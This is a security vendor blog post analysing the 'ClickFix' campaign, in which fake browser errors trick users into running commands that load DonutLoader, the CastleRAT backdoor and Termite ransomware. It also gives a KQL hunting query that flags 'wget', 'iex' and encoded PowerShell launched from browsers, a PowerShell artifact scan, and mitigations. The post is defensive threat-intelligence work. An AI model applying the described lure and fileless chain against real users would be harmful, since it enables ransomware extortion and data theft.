In the ever-evolving landscape of cyber threats, social engineering remains one of the most potent weapons in an attacker's arsenal. Recently, the threat actor known as Velvet Tempest has been observed refining this approach with a sophisticated campaign dubbed "ClickFix." By masquerading as legitimate system errors, they are successfully bypassing traditional user skepticism to deliver a dangerous payload: the Termite ransomware and the CastleRAT backdoor.
The ClickFix Mechanism: A Modern Trojan Horse
The "ClickFix" technique is insidious because it preys on a user's desire to fix a problem immediately. Rather than relying solely on malicious email attachments, these attacks often begin when a user lands on a compromised or fraudulent website. Once there, the site displays a convincing, albeit fake, browser error or CAPTCHA verification failure.
The "fix" provided involves copying and executing a PowerShell or Bash command directly into the terminal. This method is particularly effective because it leverages Living Off the Land Binaries (LOLBins)—legitimate Windows utilities—to execute malicious code under the guise of system repair. By convincing the user to run the command themselves, attackers effectively bypass automated download filters and initial endpoint heuristics.
The Malware Chain: From DonutLoader to Ransomware
Once the user executes the provided command, the infection chain begins in earnest. Velvet Tempest utilizes DonutLoader, a shellcode generator that allows for the execution of Position Independent Code (PIC) in memory. This "fileless" nature makes detection significantly harder, as the malware is never written to the disk in a traditional executable format.
DonutLoader paves the way for CastleRAT, a remote access Trojan that provides the attackers with a persistent foothold. CastleRAT allows for command and control (C2), data exfiltration, and lateral movement across the network. Once the network is adequately mapped and credentials are stolen, the attackers deploy the final payload: Termite ransomware. This results in the encryption of critical files and a demand for ransom, completing the extortion cycle.
Technical Analysis and TTPs
Velvet Tempest's campaign demonstrates a high degree of operational security. The use of DonutLoader allows them to obfuscate the final payload, often encrypting the shellcode to evade signature-based antivirus solutions. Furthermore, the transition from social engineering (ClickFix) to technical exploitation (LOLBins and fileless execution) creates a blurred line that confuses many legacy security controls.
The primary attack vectors include:
- Social Engineering: Fake browser updates and error messages.
- Process Injection: Using DonutLoader to inject shellcode into legitimate processes like
regsvr32.exeormshta.exe. - Persistence: Establishing C2 channels via CastleRAT to maintain long-term access.
Detection and Threat Hunting
Defending against this campaign requires a shift from reactive blocking to proactive threat hunting. Security teams should monitor for suspicious process chains originating from user-initiated PowerShell sessions.
KQL Query (Sentinel/Defender)
Use this KQL query to hunt for suspicious PowerShell activity initiated by browsers or terminating in LOLBins typical of the DonutLoader injection process.
DeviceProcessEvents
| where Timestamp > ago(7d)
// Look for PowerShell or CMD execution
| where FileName in~ ("powershell.exe", "cmd.exe", "pwsh.exe")
// Check for commands involving base64 encoding or web requests
| where ProcessCommandLine contains "enc" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "iex"
// Correlate with browser initiation (ClickFix vector)
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
| order by Timestamp desc
PowerShell Hunting Script
This script can be used to scan for signs of CastleRAT persistence or suspicious recent script executions in common user directories.
# Hunt for suspicious recent scripts in user directories
$TimeThreshold = (Get-Date).AddDays(-3)
$UserPaths = @("$env:APPDATA", "$env:LOCALAPPDATA", "$env:TEMP")
$SuspiciousFiles = Get-ChildItem -Path $UserPaths -Recurse -ErrorAction SilentlyContinue |
Where-Object {
$_.LastWriteTime -gt $TimeThreshold -and
($_.Extension -match '\.(ps1|bat|vbs|js)' -or $_.Name -match 'update')
}
if ($SuspiciousFiles) {
Write-Host "Potential Threat Artifacts Found:" -ForegroundColor Red
$SuspiciousFiles | Select-Object FullName, LastWriteTime, Length
} else {
Write-Host "No suspicious artifacts found in the last 3 days." -ForegroundColor Green
}
Mitigation Strategies
To protect your organization from ClickFix and subsequent ransomware attacks, consider the following actionable steps:
- Application Control (AppLocker): Strictly limit the usage of PowerShell and CMD for general users. Create rules that prevent these shells from being launched by web browsers.
- User Education: Conduct specific training regarding "fake error" scams. Users must understand that legitimate browsers will never ask them to copy and paste commands into a terminal to fix a connection issue.
- ASR Rules: Enable Microsoft Defender Attack Surface Reduction (ASR) rules, specifically "Block all Office applications from creating child processes" and "Block Win32 API calls from Office macro code," as similar vectors are often used.
- Network Segmentation: Restrict lateral movement to prevent CastleRAT from spreading from a single infected endpoint to domain controllers.
Conclusion
The Velvet Tempest campaign highlights the increasing sophistication of social engineering. By turning the user into an unwitting accomplice via ClickFix, attackers effectively dismantle the perimeter defenses. Vigilance, combined with robust detection queries and strict application control, is essential to stopping Termite ransomware before it encrypts your data.
Related Resources
Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.